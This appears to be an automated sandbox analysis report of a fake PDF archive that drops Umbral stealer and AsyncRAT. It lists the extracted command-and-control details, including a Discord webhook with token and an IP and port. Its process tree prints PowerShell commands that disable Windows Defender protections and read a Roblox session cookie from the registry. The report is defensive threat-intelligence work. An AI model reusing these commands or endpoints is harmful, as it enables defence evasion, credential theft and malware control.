Analysis

  • max time kernel
    146s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07-08-2023 05:52

General

  • Target

    https://cryptocurrencysplcfx.com/map/Allergy_document.pdf.zip

Malware Config

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1136289516206956546/U2aS5CJPqDV1OobfbiAj6zpDaSbZlgUvoBEbI_xUq34ib1t_tYhlgrzbNXjwKp7QL65n

Extracted

Family

asyncrat

Version

5.0.5

Botnet

Venom Clients

C2

89.23.101.38:5306

Mutex

Venom_RAT_HVNC_Mutex_Venom RAT_HVNC

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Detect Umbral payload 4 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Async RAT payload 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 29 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 37 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cryptocurrencysplcfx.com/map/Allergy_document.pdf.zip
    1⤵
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:492
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff94ea546f8,0x7ff94ea54708,0x7ff94ea54718
      2⤵
        PID:4448
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,3676158453667001505,12508216748016089990,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 /prefetch:3
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:1976
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,3676158453667001505,12508216748016089990,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2128 /prefetch:2
        2⤵
          PID:3772
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,3676158453667001505,12508216748016089990,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2476 /prefetch:8
          2⤵
            PID:3724
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,3676158453667001505,12508216748016089990,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
            2⤵
              PID:348
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,3676158453667001505,12508216748016089990,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1
              2⤵
                PID:4328
              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,3676158453667001505,12508216748016089990,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5384 /prefetch:8
                2⤵
                  PID:5048
                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,3676158453667001505,12508216748016089990,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5384 /prefetch:8
                  2⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4820
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,3676158453667001505,12508216748016089990,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5436 /prefetch:1
                  2⤵
                    PID:5080
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,3676158453667001505,12508216748016089990,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4768 /prefetch:1
                    2⤵
                      PID:2312
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,3676158453667001505,12508216748016089990,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
                      2⤵
                        PID:4916
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2120,3676158453667001505,12508216748016089990,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5896 /prefetch:8
                        2⤵
                        • Suspicious behavior: EnumeratesProcesses
                        PID:2944
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2120,3676158453667001505,12508216748016089990,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5284 /prefetch:8
                        2⤵
                          PID:4848
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,3676158453667001505,12508216748016089990,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5924 /prefetch:1
                          2⤵
                            PID:4696
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,3676158453667001505,12508216748016089990,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5904 /prefetch:1
                            2⤵
                              PID:4304
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,3676158453667001505,12508216748016089990,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5556 /prefetch:1
                              2⤵
                                PID:3748
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,3676158453667001505,12508216748016089990,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6172 /prefetch:2
                                2⤵
                                • Suspicious behavior: EnumeratesProcesses
                                PID:460
                            • C:\Windows\System32\CompPkgSrv.exe
                              C:\Windows\System32\CompPkgSrv.exe -Embedding
                              1⤵
                                PID:1052
                              • C:\Windows\System32\CompPkgSrv.exe
                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                1⤵
                                  PID:4552
                                • C:\Windows\System32\rundll32.exe
                                  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                  1⤵
                                    PID:3136
                                  • C:\Program Files\7-Zip\7zG.exe
                                    "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap13847:102:7zEvent12040
                                    1⤵
                                    • Suspicious use of AdjustPrivilegeToken
                                    • Suspicious use of FindShellTrayWindow
                                    PID:1120
                                  • C:\Program Files\7-Zip\7zG.exe
                                    "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap20113:102:7zEvent4414
                                    1⤵
                                    • Suspicious use of AdjustPrivilegeToken
                                    • Suspicious use of FindShellTrayWindow
                                    PID:1808
                                  • \??\E:\document.pdf.exe
                                    "E:\document.pdf.exe"
                                    1⤵
                                    • Adds Run key to start application
                                    • Suspicious use of SetThreadContext
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2360
                                    • C:\Users\Admin\AppData\Local\Temp\Umbral.exe
                                      "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3488
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
                                        3⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4260
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                        3⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:948
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                        3⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:420
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                        3⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:956
                                      • C:\Windows\System32\Wbem\wmic.exe
                                        "wmic.exe" os get Caption
                                        3⤵
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:488
                                      • C:\Windows\System32\Wbem\wmic.exe
                                        "wmic.exe" computersystem get totalphysicalmemory
                                        3⤵
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4568
                                      • C:\Windows\System32\Wbem\wmic.exe
                                        "wmic.exe" csproduct get uuid
                                        3⤵
                                          PID:2392
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                          3⤵
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:3392
                                        • C:\Windows\System32\Wbem\wmic.exe
                                          "wmic" path win32_VideoController get name
                                          3⤵
                                          • Detects videocard installed
                                          PID:4532
                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                        2⤵
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4392

                                    Network

                                    MITRE ATT&CK Enterprise v15

                                    Replay Monitor

                                    Loading Replay Monitor...

                                    Downloads

                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                      Filesize

                                      2KB

                                      MD5

                                      d85ba6ff808d9e5444a4b369f5bc2730

                                      SHA1

                                      31aa9d96590fff6981b315e0b391b575e4c0804a

                                      SHA256

                                      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                      SHA512

                                      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                      Filesize

                                      152B

                                      MD5

                                      3423d7e71b832850019e032730997f69

                                      SHA1

                                      bbc91ba3960fb8f7f2d5a190e6585010675d9061

                                      SHA256

                                      53770e40359b9738d8898520d7e4a57c28498edddbadf76ec4a599837aa0c649

                                      SHA512

                                      03d5fee4152300d6c5e9f72c059955c944c7e6d207e433e9fdd693639e63ea699a01696d7bbf56d2033fd52ad260c9ae36a2c5c888112d81bf7e04a3f273e65d

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                      Filesize

                                      111B

                                      MD5

                                      285252a2f6327d41eab203dc2f402c67

                                      SHA1

                                      acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

                                      SHA256

                                      5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

                                      SHA512

                                      11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                      Filesize

                                      412B

                                      MD5

                                      3cc7b702efe7909eca553bd00f9dceda

                                      SHA1

                                      058b411c62c7ccc42f27d85b54116e5f4a70ae3a

                                      SHA256

                                      45c1b84692496906cb15412df577bdd1f7b3e6d805c28e5ec3f44a3bd0aa6828

                                      SHA512

                                      be1778a374bd61eb379d65c4ffb8fa6b05e6f810432547b0418fa88910a8d35e649a74bbe22acc65475bb5644f41cff36d39218dad41398bd98098c469314ff3

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                      Filesize

                                      5KB

                                      MD5

                                      93c48e4364614a857f42b76a1abafb12

                                      SHA1

                                      c643b507d32665909fa091aa6fd218a5ab2c13be

                                      SHA256

                                      156145462c0c5fdd70f7e541d5c7ffbd35149cb2c746862aaa7f79443e04fdd5

                                      SHA512

                                      d149ab70872ce14ddc2c9877a472a76ea2479cc82d6e093dee519ebebf6a50d45a7e828eeb660f025701145c5ea6750b2eae533d42676ee22d2ab054003332d1

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

                                      Filesize

                                      24KB

                                      MD5

                                      0e78f9a3ece93ae9434c64ea2bff51dc

                                      SHA1

                                      a0e4c75fe32417fe2df705987df5817326e1b3b9

                                      SHA256

                                      5c8ce4455f2a3e5f36f30e7100f85bdd5e44336a8312278769f89f68b8d60e68

                                      SHA512

                                      9d1686f0b38e3326ad036c8b218b61428204910f586dccf8b62ecbed09190f7664a719a89a6fbc0ecb429aecf5dd0ec06de44be3a1510369e427bde0626fd51d

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                      Filesize

                                      16B

                                      MD5

                                      6752a1d65b201c13b62ea44016eb221f

                                      SHA1

                                      58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                      SHA256

                                      0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                      SHA512

                                      9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\ecf74bef-d528-4a24-ba10-34ce542d7d74.tmp

                                      Filesize

                                      5KB

                                      MD5

                                      1018c9cf498c97310f05a81771afd0dd

                                      SHA1

                                      fe75aeb01321d2479b26ebbddaa97ce93386e459

                                      SHA256

                                      7620479107f023b9ef48fecb301ba219dfe20bc48d1cb23eece665ab3b5d56de

                                      SHA512

                                      9227de9f87ce61e56dd819dc276dfa429d8b83ff7316886dc58db6e20014a7df5e3c2978211c2e1a3b479a43c60cc4454eb5653caea0172026c620d8426675d6

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                      Filesize

                                      13KB

                                      MD5

                                      a0bb423d370dce7ef81399654b8b03fa

                                      SHA1

                                      b45d65dec0a340c8f50285004618a2a38b298897

                                      SHA256

                                      82e8653facd7bbf2d23ecc08f2ec5174a450f28019697b1e15c43786ad566343

                                      SHA512

                                      1096faa47708517b764063ba2e2c512ac14c3295c3af1311ae456a51ff47cc5d6f064237e1e8449f8d19244a96a586d58dd9c990a303da93b62a792ecc77e5ae

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                      Filesize

                                      12KB

                                      MD5

                                      475968152d56b73f3e47e5982b426bb2

                                      SHA1

                                      f8b35db9d7003222fe6d1e7d049a349348dfe683

                                      SHA256

                                      16aa40544698eca5d4441dea6f1d5a4270c5e00eb4e35017440ade39bd1628c4

                                      SHA512

                                      2b02599641c276bd2e78a416f1a88684e6c186f51b838a411b126cca9d095855cf28b414f0c048f795e802efd864a5781ebc08feac971aef6849c6fef0251a9c

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                      Filesize

                                      12KB

                                      MD5

                                      4623b34d556ad9879516d7c3e1851849

                                      SHA1

                                      545b7fc9ef91c559512903d04201a7fc0218640c

                                      SHA256

                                      3bbb050958cb3b389bc249fb54df77984245f5c9c0be9fc2ad867bedfc133a71

                                      SHA512

                                      e49ecf78956c1a2c10d3f12c316e38a9f2b66988f77439e6726ac016a61a63cdfe9c62deb403210d34f8ff4512f08649722f230bab1dcd7486915204aa68ec25

                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                      Filesize

                                      944B

                                      MD5

                                      cadef9abd087803c630df65264a6c81c

                                      SHA1

                                      babbf3636c347c8727c35f3eef2ee643dbcc4bd2

                                      SHA256

                                      cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

                                      SHA512

                                      7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                      Filesize

                                      948B

                                      MD5

                                      6a29e9f9eb72c3bffbb054cd27e3ceea

                                      SHA1

                                      d38f7c2ad68dcf1d24deca9792256ff53d5218b2

                                      SHA256

                                      7a9f831f96b9e4843751dea3ed57ee11d70bb83a5970ddf9d6bd440f4def442c

                                      SHA512

                                      b4826f172c6ac60ad17412a634987c45640b1b8fe03aecba26510ae224685bcd571bc4b131724036e2b502b3a8198fb69414be8c72e46f833f0601a15d313430

                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                      Filesize

                                      1KB

                                      MD5

                                      88be3bc8a7f90e3953298c0fdbec4d72

                                      SHA1

                                      f4969784ad421cc80ef45608727aacd0f6bf2e4b

                                      SHA256

                                      533c8470b41084e40c5660569ebbdb7496520d449629a235e8053e84025f348a

                                      SHA512

                                      4fce64e2dacddbc03314048fef1ce356ee2647c14733da121c23c65507eeb8d721d6b690ad5463319b364dc4fa95904ad6ab096907f32918e3406ef438a6ef7c

                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                      Filesize

                                      1KB

                                      MD5

                                      a37e681379ef52d899282b3d1ec4fe59

                                      SHA1

                                      1379abaac57c28acc241db96960bf4666350879a

                                      SHA256

                                      ed984ceac1171f9f1faf60c01b5d3193940f1c3316794daf8185c02ae8a55eef

                                      SHA512

                                      e60c1ff19761ce25f54e86c4a5d165720833d6172d0fd3382cabdcf4291183549d12bd0bbc933f290149f657f504c3417ff9879e278546bf00d9135d3cd4d9b1

                                    • C:\Users\Admin\AppData\Local\Temp\Umbral.exe

                                      Filesize

                                      231KB

                                      MD5

                                      1ebdf259edc373076b90028910c4e4b6

                                      SHA1

                                      417bb7de24b9ebacccf7b236fbc1b5c30427bb23

                                      SHA256

                                      f8ec5ee364a3b7ae65d3c5b79e9eeaa0b23c5d762cc5b86d5748b9e7565459b6

                                      SHA512

                                      b3b2bff7b7ee2118754fcdc3f2f09b89ffd1a98da92ca8df76252b2676d532c569356206683c0f434921c73bb7ae1a016d72544d98148d9714d09be3461c7ce7

                                    • C:\Users\Admin\AppData\Local\Temp\Umbral.exe

                                      Filesize

                                      231KB

                                      MD5

                                      1ebdf259edc373076b90028910c4e4b6

                                      SHA1

                                      417bb7de24b9ebacccf7b236fbc1b5c30427bb23

                                      SHA256

                                      f8ec5ee364a3b7ae65d3c5b79e9eeaa0b23c5d762cc5b86d5748b9e7565459b6

                                      SHA512

                                      b3b2bff7b7ee2118754fcdc3f2f09b89ffd1a98da92ca8df76252b2676d532c569356206683c0f434921c73bb7ae1a016d72544d98148d9714d09be3461c7ce7

                                    • C:\Users\Admin\AppData\Local\Temp\Umbral.exe

                                      Filesize

                                      231KB

                                      MD5

                                      1ebdf259edc373076b90028910c4e4b6

                                      SHA1

                                      417bb7de24b9ebacccf7b236fbc1b5c30427bb23

                                      SHA256

                                      f8ec5ee364a3b7ae65d3c5b79e9eeaa0b23c5d762cc5b86d5748b9e7565459b6

                                      SHA512

                                      b3b2bff7b7ee2118754fcdc3f2f09b89ffd1a98da92ca8df76252b2676d532c569356206683c0f434921c73bb7ae1a016d72544d98148d9714d09be3461c7ce7

                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_njgqutya.3px.ps1

                                      Filesize

                                      60B

                                      MD5

                                      d17fe0a3f47be24a6453e9ef58c94641

                                      SHA1

                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                      SHA256

                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                      SHA512

                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                    • C:\Users\Admin\Downloads\Allergy_document.pdf.zip

                                      Filesize

                                      211KB

                                      MD5

                                      916a006609e2159b954bfd56a9277b96

                                      SHA1

                                      bc88bd04789e5e2d188de1b47a688dd92690c945

                                      SHA256

                                      da6ed2b68ae6de8d35be3501bab4b8e5949b830617b0945f9c7461a50b690dcd

                                      SHA512

                                      46a1f18d4e1c604bd42eff3ef723aaca13b5fc82673bd6ace9394bfa4c4200e5d11818a70c8bf3234f8f8d7090d0419f11fb4d18db1c474a65c81a4a6befaee2

                                    • C:\Users\Admin\Downloads\Allergy_document.pdf.zip

                                      Filesize

                                      211KB

                                      MD5

                                      916a006609e2159b954bfd56a9277b96

                                      SHA1

                                      bc88bd04789e5e2d188de1b47a688dd92690c945

                                      SHA256

                                      da6ed2b68ae6de8d35be3501bab4b8e5949b830617b0945f9c7461a50b690dcd

                                      SHA512

                                      46a1f18d4e1c604bd42eff3ef723aaca13b5fc82673bd6ace9394bfa4c4200e5d11818a70c8bf3234f8f8d7090d0419f11fb4d18db1c474a65c81a4a6befaee2

                                    • C:\Users\Admin\Downloads\Property_pdf.img

                                      Filesize

                                      446KB

                                      MD5

                                      e44f3727f5d57ecbe6ab5cb16f07a360

                                      SHA1

                                      125cbc86a515f45ca67519930cdd475b3a30d86a

                                      SHA256

                                      1927477595ad8a5db5d9c0f598423f66610250014b0b460d1791b4bbdadee2b5

                                      SHA512

                                      747a455a0dfa32bbf380020ae9dc963208f385a3df08f20830f0618a13384f6a50e56e87fbd92c73753125694ec3d548a50555be052bd9baedf0c7fba5dadf69

                                    • memory/420-1458-0x00007FF93B250000-0x00007FF93BD11000-memory.dmp

                                      Filesize

                                      10.8MB

                                    • memory/420-1431-0x00007FF93B250000-0x00007FF93BD11000-memory.dmp

                                      Filesize

                                      10.8MB

                                    • memory/420-1432-0x0000024AF8AA0000-0x0000024AF8AB0000-memory.dmp

                                      Filesize

                                      64KB

                                    • memory/420-1433-0x0000024AF8AA0000-0x0000024AF8AB0000-memory.dmp

                                      Filesize

                                      64KB

                                    • memory/420-1444-0x0000024AF8AA0000-0x0000024AF8AB0000-memory.dmp

                                      Filesize

                                      64KB

                                    • memory/948-1423-0x000001D3366A0000-0x000001D3366B0000-memory.dmp

                                      Filesize

                                      64KB

                                    • memory/948-1415-0x000001D3366A0000-0x000001D3366B0000-memory.dmp

                                      Filesize

                                      64KB

                                    • memory/948-1408-0x00007FF93B250000-0x00007FF93BD11000-memory.dmp

                                      Filesize

                                      10.8MB

                                    • memory/948-1426-0x00007FF93B250000-0x00007FF93BD11000-memory.dmp

                                      Filesize

                                      10.8MB

                                    • memory/956-1459-0x00007FF93B250000-0x00007FF93BD11000-memory.dmp

                                      Filesize

                                      10.8MB

                                    • memory/956-1461-0x00000231AC860000-0x00000231AC870000-memory.dmp

                                      Filesize

                                      64KB

                                    • memory/956-1460-0x00000231AC860000-0x00000231AC870000-memory.dmp

                                      Filesize

                                      64KB

                                    • memory/956-1473-0x00007FF93B250000-0x00007FF93BD11000-memory.dmp

                                      Filesize

                                      10.8MB

                                    • memory/2360-1364-0x0000000006540000-0x0000000006541000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/2360-293-0x0000000007BB0000-0x0000000007C7D000-memory.dmp

                                      Filesize

                                      820KB

                                    • memory/2360-323-0x0000000007BB0000-0x0000000007C7D000-memory.dmp

                                      Filesize

                                      820KB

                                    • memory/2360-325-0x0000000007BB0000-0x0000000007C7D000-memory.dmp

                                      Filesize

                                      820KB

